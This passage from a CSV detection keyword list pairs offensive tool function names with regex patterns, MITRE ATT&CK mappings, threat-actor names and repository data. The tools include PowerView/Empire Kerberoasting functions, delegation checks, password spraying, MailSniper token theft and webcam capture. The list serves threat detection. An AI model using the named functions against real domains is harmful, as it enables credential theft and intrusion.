T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Get-SiteListPassword.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*get-delegation *All*",".{0,1000}get\-delegation\s.{0,1000}All.{0,1000}","offensive_tool_keyword","DelegationBOF","This tool uses LDAP to check a domain for known abusable Kerberos delegation settings. Currently. it supports RBCD. Constrained. Constrained w/Protocol Transition. and Unconstrained Delegation checks.","T1098 - T1214 - T1552","TA0006","N/A","N/A","Credential Access","https://github.com/IcebreakerSecurity/DelegationBOF","1","0","N/A","N/A","10","133","21","2022-05-04T14:00:36Z","2022-03-28T20:14:24Z" "*get-delegation *Unconstrained*",".{0,1000}get\-delegation\s.{0,1000}Unconstrained.{0,1000}","offensive_tool_keyword","DelegationBOF","This tool uses LDAP to check a domain for known abusable Kerberos delegation settings. Currently. it supports RBCD. Constrained. Constrained w/Protocol Transition. and Unconstrained Delegation checks.","T1098 - T1214 - T1552","TA0006","N/A","N/A","Credential Access","https://github.com/IcebreakerSecurity/DelegationBOF","1","0","N/A","N/A","10","133","21","2022-05-04T14:00:36Z","2022-03-28T20:14:24Z" "*Get-DFSshare*",".{0,1000}Get\-DFSshare.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","11481","4570","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" "*Get-DiscosdurosGet-PSDrive*",".{0,1000}Get\-DiscosdurosGet\-PSDrive.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1044","504","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" "*getdllbaseaddress*",".{0,1000}getdllbaseaddress.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "*get-dodgyprocesses*",".{0,1000}get\-dodgyprocesses.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "*Get-DomainAdmins.ps1*",".{0,1000}Get\-DomainAdmins\.ps1.{0,1000}","offensive_tool_keyword","ScriptSentry","ScriptSentry finds misconfigured and dangerous logon scripts.","T1037 - T1037.005 - T1046","TA0005 - TA0007","N/A","N/A","Credential Access","https://github.com/techspence/ScriptSentry","1","0","N/A","7","2","151","16","2024-04-30T13:39:02Z","2023-07-22T03:17:58Z" "*Get-DomainComputer -TrustedToAuth | select name",".{0,1000}Get\-DomainComputer\s\-TrustedToAuth\s\|\sselect\sname","offensive_tool_keyword","AD exploitation cheat sheet","msds-allowedtodelegateto*","T1595 - T1590 - T1591 - T1213 - T1039 - T1592","N/A","N/A","N/A","Lateral Movement","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*Get-DomainDFSShareV1*",".{0,1000}Get\-DomainDFSShareV1.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","powerview.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Get-DomainDFSShareV2*",".{0,1000}Get\-DomainDFSShareV2.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","powerview.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Get-DomainForeignGroupMember*",".{0,1000}Get\-DomainForeignGroupMember.{0,1000}","offensive_tool_keyword","AD exploitation cheat sheet","Abusing inter-forest trust Powersploit","T1550 - T1555 - T1212 - T1558","N/A","N/A","N/A","Exploitation tools","https://powersploit.readthedocs.io/en/latest/Recon/Get-DomainForeignGroupMember/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*Get-DomainManagedSecurityGroup*",".{0,1000}Get\-DomainManagedSecurityGroup.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","powerview.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Get-DomainObjectACL -*",".{0,1000}Get\-DomainObjectACL\s\-.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","powerview.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Get-DomainSearcher*",".{0,1000}Get\-DomainSearcher.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*GetDomainsForEnumeration*",".{0,1000}GetDomainsForEnumeration.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","1","N/A","N/A","7","609","135","2024-04-30T13:43:35Z","2021-07-12T17:07:04Z" "*Get-DomainSpn*",".{0,1000}Get\-DomainSpn.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Get-SQLInstanceDomain.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*getdomainspnticket*",".{0,1000}getdomainspnticket.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Aggressor script menu for Powerview/SharpView","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tevora-threat/PowerView3-Aggressor","1","1","N/A","10","10","128","40","2018-07-24T21:52:03Z","2018-07-24T21:16:10Z" "*Get-DomainSPNTicket*",".{0,1000}Get\-DomainSPNTicket.{0,1000}","offensive_tool_keyword","BloodHound","Kerberoasting With PowerView","T1558 - T1208 - T1552","TA0004 - TA0002","N/A","N/A","Exploitation tools","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","1","N/A","10","10","9395","1668","2024-02-09T22:50:23Z","2016-04-17T18:36:14Z" "*Get-DomainSPNTicket*",".{0,1000}Get\-DomainSPNTicket.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Aggressor script menu for Powerview/SharpView","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tevora-threat/PowerView3-Aggressor","1","1","N/A","10","10","128","40","2018-07-24T21:52:03Z","2018-07-24T21:16:10Z" "*Get-DomainSPNTicket*",".{0,1000}Get\-DomainSPNTicket.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Get-DomainSPNTicket*",".{0,1000}Get\-DomainSPNTicket.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","powerview.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*GetDomainSPNTickets(*",".{0,1000}GetDomainSPNTickets\(.{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/cobbr/SharpSploit","1","0","N/A","10","10","1692","303","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z" "*Get-DomainUser -TrustedToAuth | select userprincipalname",".{0,1000}Get\-DomainUser\s\-TrustedToAuth\s\|\sselect\suserprincipalname","offensive_tool_keyword","AD exploitation cheat sheet","msds-allowedtodelegateto*","T1595 - T1590 - T1591 - T1213 - T1039 - T1592","N/A","N/A","N/A","Lateral Movement","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*Get-DomainUserList -Domain * -RemoveDisabled *",".{0,1000}Get\-DomainUserList\s\-Domain\s.{0,1000}\s\-RemoveDisabled\s.{0,1000}","offensive_tool_keyword","DomainPasswordSpray","DomainPasswordSpray is a tool written in PowerShell to perform a password spray attack against users of a domain.","T1110.001 - T1110.003","TA0001 - TA0006","N/A","N/A","Credential Access","https://github.com/dafthack/DomainPasswordSpray","1","1","N/A","10","10","1636","362","2023-09-22T22:13:14Z","2016-10-04T23:37:37Z" "*Get-DXWebcamVideo.ps1*",".{0,1000}Get\-DXWebcamVideo\.ps1.{0,1000}","offensive_tool_keyword","SharpDXWebcam","Utilizing DirectX and DShowNET assemblies to record video from a host's webcam","T1123 - T1059.001 - T1027.002","TA0009 - TA0005 - TA0040","N/A","N/A","POST Exploitation tools","https://github.com/snovvcrash/SharpDXWebcam","1","1","N/A","8","1","79","10","2023-07-19T21:09:00Z","2023-07-12T03:26:24Z" "*Get-ExchangeAccessToken*",".{0,1000}Get\-ExchangeAccessToken.{0,1000}","offensive_tool_keyword","MailSniper","MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. or by an administrator to search the mailboxes of every user in a domain.","T1114 - T1134.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1","1","1","N/A","N/A","10","2810","550","2022-10-20T08:13:33Z","2016-09-08T00:36:51Z" "*Get-ExoPsAccessToken*",".{0,1000}Get\-ExoPsAccessToken.{0,1000}","offensive_tool_keyword","MailSniper","MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. or by an administrator to search the mailboxes of every user in a domain.","T1114 - T1134.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1","1","1","N/A","N/A","10","2810","550","2022-10-20T08:13:33Z","2016-09-08T00:36:51Z" "*getExploit.py*",".{0,1000}getExploit\.py.{0,1000}","offensive_tool_keyword","getExploit","Python script to explore exploits from exploit-db.com. Exist a similar script in Kali Linux. but in difference this python script will have provide more flexibility at search and download time.","T1587 - T1068 - T1211 - T1210 - T1588","TA0006 - TA0002 - TA0009 - TA0003 - TA0008","N/A","N/A","Exploitation tools","https://github.com/Gioyik/getExploit","1","1","N/A","N/A","1","44","27","2015-06-26T16:38:55Z","2015-01-03T03:26:21Z" "*getexploitablesystem*",".{0,1000}getexploitablesystem.{0,1000}","offensive_tool_keyword","cobaltstrike","PowerView menu for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tevora-threat/aggressor-powerview","1","1","N/A","10","10","63","18","2018-03-22T00:21:57Z","2018-03-22T00:21:13Z" "*Get-ExploitableSystem*",".{0,1000}Get\-ExploitableSystem.{0,1000}","offensive_tool_keyword","cobaltstrike","PowerView menu for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tevora-threat/aggressor-powerview","1","1","N/A","10","10","63","18","2018-03-22T00:21:57Z","2018-03-22T00:21:13Z" "*Get-ExploitableSystem*",".{0,1000}Get\-ExploitableSystem.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that 